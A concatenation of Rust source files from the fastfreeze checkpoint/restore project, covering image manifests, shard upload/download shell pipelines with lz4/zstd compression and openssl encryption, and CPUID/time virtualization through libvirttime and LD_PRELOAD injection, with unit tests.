metrics and log files to a specific checkpoint command. pub fn new(num_shards: u32, encrypt: bool, compression: Option<Compression>) -> Self { Self { version: String::from(CURRENT_IMG_VERSION), shard_prefix: INVOCATION_ID.clone(), encryption: if encrypt { Some(Encryption::default()) } else { None }, compression, num_shards, } } pub fn to_json(&self) -> String { // unwrap() is safe. The JSON serialization can't fail. 
serde_json::to_string(self).unwrap() } pub fn from_json(manifest_json: &str, allow_bad_image_version: bool) -> Result<ManifestFetchResult> { use ManifestFetchResult::*; // We first parse the JSON uninterpreted to check for the version. // If we have a match, we proceed to destructuring the JSON into our ImageDescriptor. let manifest: serde_json::Value = serde_json::from_str(manifest_json) .with_context(|| format!("Malformed json: {}", manifest_json))?; Ok(if manifest["version"] == CURRENT_IMG_VERSION || allow_bad_image_version { let manifest = serde_json::from_value(manifest) .with_context(|| format!("Failed to parse image descriptor: {}", manifest_json))?; Some(manifest) } else { VersionMismatch { fetched: manifest["version"].to_string(), desired: CURRENT_IMG_VERSION.to_string(), } }) } pub fn persist_to_store(&self, store: &dyn Store) -> Result<()> { store.file(MANIFEST_FILE_NAME).write("upload manifest", &self.to_json().as_bytes()) } pub fn fetch_from_store(store: &dyn Store, allow_bad_image_version: bool) -> Result<ManifestFetchResult> { Ok(match store.file(MANIFEST_FILE_NAME).try_read("download manifest")? { Some(manifest_json) => Self::from_json(&String::from_utf8_lossy(&manifest_json), allow_bad_image_version)?, None => ManifestFetchResult::NotFound, }) } } impl fmt::Display for ImageManifest { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "version={}, num_shards={} compression={} encryption={} prefix={}", self.version, self.num_shards, self.compression.as_ref().map_or_else(|| "none".to_string(), |d| format!("{}", d)), self.encryption.as_ref().map_or_else(|| "none".to_string(), |d| format!("{}", d)), self.shard_prefix) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/shard.rs
src/image/shard.rs
// Copyright 2020 Two Sigma Investments, LP.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

use anyhow::Result;
use std::path::PathBuf;
use super::ImageManifest;
use crate::store::Store;

// This module only builds shell pipeline strings (stages joined with " | ")
// to move image shards in and out of a store; the processes themselves are
// spawned by the caller.

/// Store file name for shard `shard_index` (0-based) under a given prefix.
fn shard_filename(shard_prefix: &str, shard_index: u32) -> String {
    // .ffs stands for fastfreeze shard
    // Shard numbers in the file name start at 1, while `shard_index` is 0-based.
    format!("{}-{}.ffs", shard_prefix, shard_index+1)
}

/// Returns one shell pipeline per shard of the form
/// `[compress |] [encrypt |] upload`, per the manifest's settings.
///
/// Errors when the manifest requires encryption but no passphrase file is given.
pub fn upload_cmds(
    img_manifest: &ImageManifest,
    passphrase_file: Option<&PathBuf>,
    store: &dyn Store,
) -> Result<Vec<String>> {
    // Pipeline stages shared by every shard: compression first, then encryption.
    let cmd_common = {
        let mut cmd = Vec::new();

        if let Some(ref compression) = img_manifest.compression {
            cmd.push(compression.compress_cmd().to_string());
        }

        if let Some(ref encryption) = img_manifest.encryption {
            let passphrase_file = passphrase_file.ok_or_else(|| anyhow!(
                "The image must be encrypted. Use --passphrase-file to provide an encryption passphrase"))?;
            cmd.push(encryption.encrypt_cmd(passphrase_file.as_path()));
        }

        cmd
    };

    // Each shard appends its own store-specific upload command to the common stages.
    Ok((0..img_manifest.num_shards).map(|shard_index| {
        let file = store.file(&shard_filename(&img_manifest.shard_prefix, shard_index));
        let mut cmd = cmd_common.clone();
        cmd.push(file.upload_shell_cmd());
        cmd.join(" | ")
    }).collect())
}

/// Returns one shell pipeline per shard of the form
/// `download [| decrypt] [| decompress]` — the mirror of `upload_cmds`.
pub fn download_cmds(
    img_manifest: &ImageManifest,
    passphrase_file: Option<&PathBuf>,
    store: &dyn Store
) -> Result<Vec<String>> {
    // Stages shared by every shard: decryption first, then decompression
    // (reverse order of the upload pipeline).
    let cmd_common = {
        let mut cmd = Vec::new();

        if let Some(ref encryption) = img_manifest.encryption {
            let passphrase_file = passphrase_file.ok_or_else(|| anyhow!(
                "The image is encrypted. Use --passphrase-file to provide an encryption passphrase"))?;
            cmd.push(encryption.decrypt_cmd(passphrase_file.as_path()));
            info!("Decrypting image with passphrase from file {}", passphrase_file.display());
        }

        if let Some(ref compression) = img_manifest.compression {
            cmd.push(compression.decompress_cmd().to_string());
        }

        cmd
    };

    // The download command leads the pipeline; common stages are appended after it.
    Ok((0..img_manifest.num_shards).map(|shard_index| {
        let file = store.file(&shard_filename(&img_manifest.shard_prefix, shard_index));
        let mut cmd: Vec<String> = vec![file.download_shell_cmd()];
        cmd.append(&mut cmd_common.clone());
        cmd.join(" | ")
    }).collect())
}
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/encryption.rs
src/image/encryption.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ path::Path, fmt, }; use serde::{Serialize, Deserialize}; use crate::consts::*; #[derive(Serialize, Deserialize)] pub struct Encryption { pub cipher: String, } impl Encryption { pub fn new(cipher: String) -> Self { Self { cipher } } pub fn encrypt_cmd(&self, passphrase_file: &Path) -> String { format!("openssl enc -e -{} -pbkdf2 -pass file:{}", self.cipher, passphrase_file.display()) } pub fn decrypt_cmd(&self, passphrase_file: &Path) -> String { format!("openssl enc -d -{} -pbkdf2 -pass file:{}", self.cipher, passphrase_file.display()) } } impl Default for Encryption { fn default() -> Self { Self::new(DEFAULT_ENCRYPTION_CIPHER.to_string()) } } impl fmt::Display for Encryption { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.cipher) } } pub fn check_passphrase_file_exists(passphrase_file: &Path) -> Result<()> { ensure!(passphrase_file.exists(), "The passphrase file {} is not accessible", passphrase_file.display()); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/mod.rs
src/image/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod compression; mod encryption; mod manifest; pub mod shard; pub use manifest::{ManifestFetchResult, ImageManifest}; pub use compression::{Compression, CpuBudget}; pub use encryption::{Encryption, check_passphrase_file_exists};
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/compression.rs
src/image/compression.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use serde::{Serialize, Deserialize}; use std::{ str::FromStr, fmt, }; #[derive(Debug, Serialize, Deserialize)] pub enum Compression { Lz4, Zstd, } impl Compression { pub fn compress_cmd(&self) -> &str { match self { Compression::Lz4 => "lz4 -1 - -", Compression::Zstd => "zstd -1 - -", } } pub fn decompress_cmd(&self) -> &str { match self { Compression::Lz4 => "lz4 -d - -", Compression::Zstd => "zstd -d - -", } } } impl fmt::Display for Compression { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { Compression::Lz4 => write!(f, "lz4"), Compression::Zstd => write!(f, "zstd"), } } } impl From<CpuBudget> for Option<Compression> { fn from(cpu_budget: CpuBudget) -> Self { match cpu_budget { CpuBudget::Low => None, CpuBudget::Medium => Some(Compression::Lz4), CpuBudget::High => Some(Compression::Zstd), } } } #[derive(Debug, PartialEq, Copy, Clone, Serialize)] pub enum CpuBudget { Low, Medium, High, } impl FromStr for CpuBudget { type Err = anyhow::Error; fn from_str(s: &str) -> std::result::Result<Self, Self::Err> { Ok(match s { "low" => CpuBudget::Low, "medium" => CpuBudget::Medium, "high" => CpuBudget::High, _ => bail!("Possible values are [low, medium, high], not `{}`", s) }) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/virt/time.rs
src/virt/time.rs
// Copyright 2020 Two Sigma Investments, LP.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

use anyhow::{Result, Context};
use std::{
    mem::{size_of, MaybeUninit},
    os::unix::io::AsRawFd,
    path::Path,
    io::prelude::*,
    slice,
    fs,
};
use nix::{
    unistd::{lseek, Whence},
    errno::Errno,
};
use libc::timespec;
use crate::{
    consts::*,
    util::{pwrite_all, get_file_size},
};

// This file contains logic to configure libvirttime. In a nutshell, libvirttime
// is used to virtualize the CLOCK_MONOTONIC values for the application. The
// library is configured via an external file that contains all the clock time
// offsets to be applied.
//
// The config file has the following format:
// static struct virt_time_config {
//     struct timespec ts_offset;
//     struct timespec per_thread_ts[PID_MAX];
// };
//
// There is a global time offset, and a per thread time offset. All must be
// adjusted when migrating an app from a machine to another.
//
// More details can be found at https://github.com/twosigma/libvirttime

// `PID_MAX` is defined in the kernel in include/linux/threads.h
// We don't read /proc/sys/kernel/pid_max because it can vary
// from machine to machine.
const PID_MAX: u32 = 4_194_304;

const NSEC_IN_SEC: Nanos = 1_000_000_000;

/// File position of virt_time_config.thread_confs[0]
const PID_0_FPOS: i64 = size_of::<timespec>() as i64;

/// sizeof(struct per_thread_conf)
const PROCESS_AREA_SIZE: usize = size_of::<timespec>();

/// We represent a `timespec` with the nanosecs as a i128. It's easier to do
/// computation with. `Duration` is not suitable for us as it lack support
/// underflowing substractions.
pub type Nanos = i128;

// Reads the real (non-virtualized) machine monotonic clock.
// In tests it is swapped for a mock so the clock can be set explicitly.
#[cfg(not(test))]
fn clock_gettime_monotonic() -> Nanos {
    unsafe {
        // SAFETY: `ts` is only read after clock_gettime() succeeded, at which
        // point the kernel has initialized it.
        let mut ts = MaybeUninit::<timespec>::uninit();
        let res = libc::clock_gettime(libc::CLOCK_MONOTONIC, ts.as_mut_ptr());
        let value = nix::errno::Errno::result(res).expect("clock_gettime() failed");
        assert_eq!(value, 0);
        Nanos::from_timespec(ts.assume_init())
    }
}

#[cfg(test)]
fn clock_gettime_monotonic() -> Nanos {
    test::clock_gettime_mock()
}

// Conversions between the on-disk `timespec` representation and `Nanos`.
trait NanosExt {
    fn to_timespec(self) -> timespec;
    fn from_timespec(ts: timespec) -> Self;
}

impl NanosExt for Nanos {
    fn to_timespec(self) -> timespec {
        let mut ts = timespec {
            tv_sec: (self / NSEC_IN_SEC) as i64,
            tv_nsec: (self % NSEC_IN_SEC) as i64,
        };

        // nsec should always be positive as the libvirttime code assumes nsec is between 0 and
        // NSEC_IN_SEC-1. See https://github.com/twosigma/libvirttime/blob/master/src/util.h#L48
        if ts.tv_nsec < 0 {
            ts.tv_sec -= 1;
            ts.tv_nsec += NSEC_IN_SEC as i64;
        }

        ts
    }

    fn from_timespec(ts: timespec) -> Self {
        ts.tv_sec as i128 * NSEC_IN_SEC + ts.tv_nsec as i128
    }
}

// Reads one raw `timespec` from `reader` at its current position.
fn read_timespec<R: Read>(reader: &mut R) -> Result<Nanos> {
    unsafe {
        // SAFETY: the byte slice exactly covers the `timespec` storage, and
        // the struct is only assumed initialized after read_exact() filled it.
        let mut ts = MaybeUninit::<timespec>::uninit();
        let mut buf = slice::from_raw_parts_mut(
            ts.as_mut_ptr() as *mut u8, size_of::<timespec>()
        );
        reader.read_exact(&mut buf)
            .context("Failed to read from the time config file")?;
        Ok(Nanos::from_timespec(ts.assume_init()))
    }
}

// Writes one raw `timespec` at absolute file position `fpos`, without moving
// the file cursor (pwrite).
fn write_timespec_at(file: &fs::File, nanos: Nanos, fpos: i64) -> Result<()> {
    unsafe {
        // SAFETY: `ts` is fully initialized and the slice covers exactly its bytes.
        let ts = nanos.to_timespec();
        let buf = slice::from_raw_parts(
            &ts as *const timespec as *const u8, size_of::<timespec>()
        );
        pwrite_all(file, &buf, fpos)
            .context("Failed to write to the time config file")?;
        Ok(())
    }
}

/// Handle on the libvirttime config file path. Operations open the file on
/// demand with the access mode they need.
pub struct ConfigPath<'a> {
    path: &'a Path,
}

impl<'a> ConfigPath<'a> {
    pub fn new<S: AsRef<Path>>(path: &'a S) -> Self {
        // We don't open the config file at this point. Depending on the
        // operation, we might create, open_read, or open_write the file.
        Self { path: path.as_ref() }
    }

    /// Returns the current configured time offset
    fn read_configured_offset(&self) -> Result<Nanos> {
        let mut config_file = fs::File::open(&self.path)
            .with_context(|| format!("Failed to open {}. \
                It is normally created when running the application for the \
                first time via the 'run' command", self.path.display()))?;
        let ts_offset = read_timespec(&mut config_file)?;
        Ok(ts_offset)
    }

    /// Returns the offset to write in the time config file so that if the
    /// application were to call `clock_gettime(CLOCK_MONOTONIC)` immediately, it
    /// would get `app_clock`.
    fn config_time_offset(app_clock: Nanos) -> Nanos {
        let machine_clock = clock_gettime_monotonic();
        machine_clock - app_clock
    }

    /// `read_current_app_clock()` returns the same result as what the application,
    /// virtualized with libvirttime, would get if it were to call
    /// `clock_gettime(CLOCK_MONOTONIC)`.
    pub fn read_current_app_clock(&self) -> Result<Nanos> {
        let config_offset = self.read_configured_offset()?;
        let machine_clock = clock_gettime_monotonic();
        let app_clock = machine_clock - config_offset;
        Ok(app_clock)
    }

    // Total size of the config file: global offset + one slot per possible pid.
    fn expected_file_size() -> u64 {
        Self::pid_to_fpos(PID_MAX+1) as u64
    }

    /// Creates the config file from scratch with an app clock of 0.
    /// (Note: the name's missing 'i' is historical; kept for API stability.)
    pub fn write_intial(&self) -> Result<()> {
        || -> Result<_> {
            // We arbitrarily start the app clock at 0.
            let app_clock = 0;

            // The time config file must be writable by all users as we are
            // applying a system-wide virtualization configuration.
            let config_file = fs::File::create(&self.path)
                .context("File creation failed")?;

            // The config_file has the layout of the `struct virt_time_config`
            write_timespec_at(&config_file, Self::config_time_offset(app_clock), 0)?;

            // We make a bunch of holes in the file. We start empty.
            config_file.set_len(Self::expected_file_size())
                .context("ftruncate failed")?;

            Ok(())
        }().with_context(|| format!("Failed to create {}", self.path.display()))
    }

    /// PID to file position in the config file
    fn pid_to_fpos(pid: u32) -> i64 {
        PID_0_FPOS + (pid as i64)*(PROCESS_AREA_SIZE as i64)
    }

    /// file position to PID (rounded down)
    fn fpos_to_pid(fpos: i64) -> u32 {
        ((fpos - PID_0_FPOS)/(PROCESS_AREA_SIZE as i64)) as u32
    }

    /// Rewrite time offsets with the desired `app_clock`
    pub fn adjust_timespecs(&self, app_clock: Nanos) -> Result<()> {
        || -> Result<_> {
            let mut config_file = fs::OpenOptions::new()
                .read(true)
                .write(true)
                .open(&self.path)?;

            // Guard against a truncated or foreign file before patching it.
            ensure!(get_file_size(&mut config_file)? == Self::expected_file_size(),
                    "{} has an incorrect file size", self.path.display());

            let new_time_offset = Self::config_time_offset(app_clock);
            let old_time_offset = read_timespec(&mut config_file)?;
            // Delta applied to every per-thread offset below.
            let old_to_new_time_offset = new_time_offset - old_time_offset;

            // Adjust the global timespec offset
            write_timespec_at(&config_file, new_time_offset, 0)?;

            let mut pid: u32 = 1; // pid=0 does not exist

            // Adjust the threads timespec offsets
            loop {
                // With SEEK_DATA, we'll be skipping pages that have no pids.
                // It seeks to the earlist file position that has data. Typically,
                // we'll be hitting a page boundary.
                // ENXIO means no more data until EOF, i.e., we are done.
                let fpos = match lseek(config_file.as_raw_fd(), Self::pid_to_fpos(pid), Whence::SeekData) {
                    Err(e) if e.as_errno() == Some(Errno::ENXIO) => break,
                    Err(e) => bail!("seek failed: {}", e),
                    Ok(fpos) => fpos,
                };

                // Note: performance could be better as we are doing two
                // syscalls (read+write) per pid. We could improve this to only
                // do two syscalls per page. But that's for another time.

                // Compute the pid corresponding to the file position
                pid = Self::fpos_to_pid(fpos);
                assert!(pid <= PID_MAX);

                // `fpos_to_pid()` rounds down. If the returned `fpos` does not
                // correspond to the file position of the `pid`, the file
                // position is at a data page boundary. We can skip that pid as
                // we are sure that pid is unused.
                //
                //    |pid ......|pid+1 ......|
                //    ... hole  >|< data ...
                //               ^
                //                \ file_offset
                //
                if fpos == Self::pid_to_fpos(pid) {
                    // Read the current timespec, adjust it, and write it back
                    let mut offset = read_timespec(&mut config_file)?;
                    offset += old_to_new_time_offset;
                    write_timespec_at(&config_file, offset, fpos)?;
                }

                pid += 1;
            }

            Ok(())
        }().with_context(|| format!(
            "Failed to adjust timespecs in {}", self.path.display()))
    }
}

impl<'a> Default for ConfigPath<'a> {
    fn default() -> Self {
        Self::new(&*VIRT_TIME_CONF_PATH)
    }
}

#[cfg(test)]
mod test {
    use super::*;
    use std::sync::Mutex;
    use std::io::SeekFrom;

    // Mocked machine clock, settable by the test below.
    lazy_static! {
        static ref MACHINE_CLOCK: Mutex<Nanos> = Mutex::new(-1);
    }

    pub fn clock_gettime_mock() -> Nanos {
        *MACHINE_CLOCK.lock().unwrap()
    }

    #[test]
    fn test() -> Result<()> {
        let config_path = Path::new("/tmp/ff-test-time-conf");
        let _ = std::fs::remove_file(&config_path);
        let config = ConfigPath::new(&config_path);

        // Reads the per-thread slot of `pid` directly from the file.
        fn read_pid_ts(config_file: &mut fs::File, pid: u32) -> Result<Nanos> {
            config_file.seek(SeekFrom::Start(ConfigPath::pid_to_fpos(pid) as u64))?;
            read_timespec(config_file)
        }

        // Reading before the file exists must fail.
        assert!(config.read_configured_offset().is_err());

        // Clock offset is set to 100, app clock is 0.
        let mut machine_clock = NSEC_IN_SEC + 100;
        let mut app_clock = 0;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;
        config.write_intial()?;

        let mut config_file = fs::OpenOptions::new()
            .read(true)
            .write(true)
            .open(&config.path)?;

        assert_eq!(config.read_configured_offset()?, machine_clock);
        assert_eq!(config.read_current_app_clock()?, 0);

        // Clock advances by 1000, so app_clock should be 1000
        machine_clock += 1000;
        app_clock += 1000;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;
        assert_eq!(config.read_current_app_clock()?, app_clock);

        // Populate a few sparse per-pid slots by hand.
        write_timespec_at(&config_file, machine_clock + 100, ConfigPath::pid_to_fpos(1))?;
        write_timespec_at(&config_file, machine_clock + 101, ConfigPath::pid_to_fpos(10000))?;
        write_timespec_at(&config_file, machine_clock + 102, ConfigPath::pid_to_fpos(20000))?;
        write_timespec_at(&config_file, machine_clock + 103, ConfigPath::pid_to_fpos(20001))?;
        write_timespec_at(&config_file, machine_clock + 104, ConfigPath::pid_to_fpos(PID_MAX))?;

        assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?);
        assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?);
        assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?);
        assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?);
        assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?);

        // Now let's pretend we checkpoint and move to another machine.
        // app clock is still 1000, but we land on a machine whose clock with a clock in the future
        machine_clock = 10*NSEC_IN_SEC + 100;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;
        config.adjust_timespecs(app_clock)?; // the app clock we want

        assert_eq!(config.read_current_app_clock()?, app_clock);
        assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?);
        assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?);
        assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?);
        assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?);
        assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?);
        assert_eq!(0, read_pid_ts(&mut config_file, 100000)?); // should be not touched

        // What if we go on a machine which time is earlier than ours. This
        // will test overflowing substractions.
        machine_clock = 100;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;
        config.adjust_timespecs(app_clock)?; // the app clock we want

        assert_eq!(config.read_current_app_clock()?, app_clock);
        assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?);
        assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?);
        assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?);
        assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?);
        assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?);
        assert_eq!(0, read_pid_ts(&mut config_file, 100000)?);

        // Time passes
        machine_clock += 500;
        app_clock += 500;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;

        // App do some calls that use the clock
        write_timespec_at(&config_file, machine_clock + 100, ConfigPath::pid_to_fpos(1))?;
        write_timespec_at(&config_file, machine_clock + 101, ConfigPath::pid_to_fpos(10000))?;
        write_timespec_at(&config_file, machine_clock + 102, ConfigPath::pid_to_fpos(20000))?;
        write_timespec_at(&config_file, machine_clock + 103, ConfigPath::pid_to_fpos(20001))?;
        write_timespec_at(&config_file, machine_clock + 104, ConfigPath::pid_to_fpos(PID_MAX))?;

        // We checkpoint
        assert_eq!(config.read_current_app_clock()?, app_clock);

        // And restore an another machine
        machine_clock = 77;
        *MACHINE_CLOCK.lock().unwrap() = machine_clock;
        config.adjust_timespecs(app_clock)?; // the app clock we want

        assert_eq!(config.read_current_app_clock()?, app_clock);
        assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?);
        assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?);
        assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?);
        assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?);
        assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?);
        assert_eq!(0, read_pid_ts(&mut config_file, 100000)?);

        Ok(())
    }
}
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/virt/mod.rs
src/virt/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod time; use anyhow::{Result, Context}; use std::{ io::prelude::*, io::{BufRead, BufReader, BufWriter, Cursor}, os::unix::ffi::OsStrExt, env, fs, }; use crate::{ consts::*, process::{Command, Stdio, EnvVars}, }; // The application needs to be virtualized in aspects: CPUID and time. // For this, three libraries are in play: // 1) /lib64/ld-linux-x86-64.so.2: The ELF system loader. We hijack it during the // install command. We replace it with the libvirtcpuid loader. The loader // provides two things: // a) It sets up CPUID virtualization before libc's loader runs. Using // LD_PRELOAD would be too late. // More details can be found at https://github.com/twosigma/libvirtcpuid // b) It provides a way to inject environement variables in any process that uses // the ELF loader (essentially all dynamically loaded binaries). This is // especially useful to force the LD_PRELOAD env variable to applications, even // the one that try hard to clean up their environement. // Note: that's why we need libvirtcpuid, even if we don't need CPUID // virtualization. // 2) libvirtcpuid.so: This library role is to harden the virtualization put in // place by the hijacked ELF loader. It protects the SIGSEGV handler and is // loaded in the application with an LD_PRELOAD directive. // 3) libvirttime.so: This virtualizes CLOCK_MONOTONIC for the application. // It is loaded via LD_PRELOAD. 
// More details can be found at https://github.com/twosigma/libvirttime. fn env_for_virtualization() -> EnvVars { let mut env: EnvVars = EnvVars::new(); let mut ld_preloads = vec![]; // We always need time virtualization ld_preloads.push(LIBVIRTTIME_PATH.clone()); env.insert("VIRT_TIME_CONF".into(), (&*VIRT_TIME_CONF_PATH).into()); // But not always need CPUID virtualization if let Some(cpuid_mask) = env::var_os("FF_APP_VIRT_CPUID_MASK") { if !cpuid_mask.is_empty() { ld_preloads.push(LIBVIRTCPUID_PATH.clone()); env.insert("VIRT_CPUID_MASK".into(), cpuid_mask); } } // Users can force env variables via FF_APP_INJECT_* for (key, value) in env::vars_os() { // The env var key is all ASCII, it's okay to use to_string_lossy() let key = key.to_string_lossy(); if let Some(key) = key.strip_prefix("FF_APP_INJECT_") { if key == "LD_PRELOAD" { for path in env::split_paths(&value) { ld_preloads.push(path); } } else { env.insert(key.into(), value); } } } // unwrap is okay here as we cannot possibly have a ":" in one of the ld_preload paths. env.insert("LD_PRELOAD".into(), env::join_paths(ld_preloads).unwrap()); env } /// The system ELF loader interposition loads the LD_INJECT_ENV_PATH as /// environment variable for all application on the system. fn inject_env_system_wide(env: &EnvVars) -> Result<()> { || -> Result<_> { // These env variables are forced into any program // that do not have LD_ENV_DISABLE enabled. let mut ld_inject_file = BufWriter::new( fs::File::create(&*LD_INJECT_ENV_PATH)?); for (key, value) in env { // format!() would be nicer, but we need to work with OsString, not String. 
ld_inject_file.write_all(key.as_bytes())?; ld_inject_file.write_all(b"=")?; ld_inject_file.write_all(value.as_bytes())?; ld_inject_file.write_all(b"\n")?; } ld_inject_file.flush()?; Ok(()) }().with_context(|| format!("Failed to create {}", LD_INJECT_ENV_PATH.display())) } fn ensure_system_wide_virtualization_is_enabled() -> Result<()> { // Check if applications are getting virtualization env injection via libvirtcpuid. let output = || -> Result<_> { Command::new(&["env"]) .stdout(Stdio::piped()) .spawn()? .wait_with_output() .and_then(|o| o.ensure_success().map(|_| o)) }().context("Failed to run the `env` command")?; for line in BufReader::new(Cursor::new(output.stdout)).lines() { if line.unwrap_or_default().starts_with("VIRT_TIME_CONF=") { return Ok(()); } } bail!("Applications can escape virtualization, creating hard to diagnose problems. \ Run `fastfreeze install` to setup virtualization. \ A kuberbetes volume may be needed to interpose the system ELF loader"); } pub fn enable_system_wide_virtualization() -> Result<()> { let env = env_for_virtualization(); inject_env_system_wide(&env)?; ensure_system_wide_virtualization_is_enabled()?; Ok(()) } /// This function is called early on to disable the system wide time /// virtualization on our process. (we need the real time) /// It can call execve(). Note that logging is not setup yet. pub fn disable_local_time_virtualization() -> Result<()> { if env::var_os("VIRT_TIME_CONF").is_some() { // We are currently executing with time virtualization enabled. This is // a problem when we try to get the real machine clock. To avoid this, // we re-exec ourselves with LD_ENV_DISABLE set, which prevents the // libvirtcpuid's loader from injecting env variables into our process. env::set_var("LD_ENV_DISABLE", "1"); env::remove_var("VIRT_TIME_CONF"); env::remove_var("LD_PRELOAD"); // libvirttime.so is in there, and needs to go. 
Command::new(env::args_os()) .exec() .context("Failed to execve() ourselves to disable time virtualization") } else { // We are not virtualized, but our children should be. env::remove_var("LD_ENV_DISABLE"); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/gs.rs
src/store/gs.rs
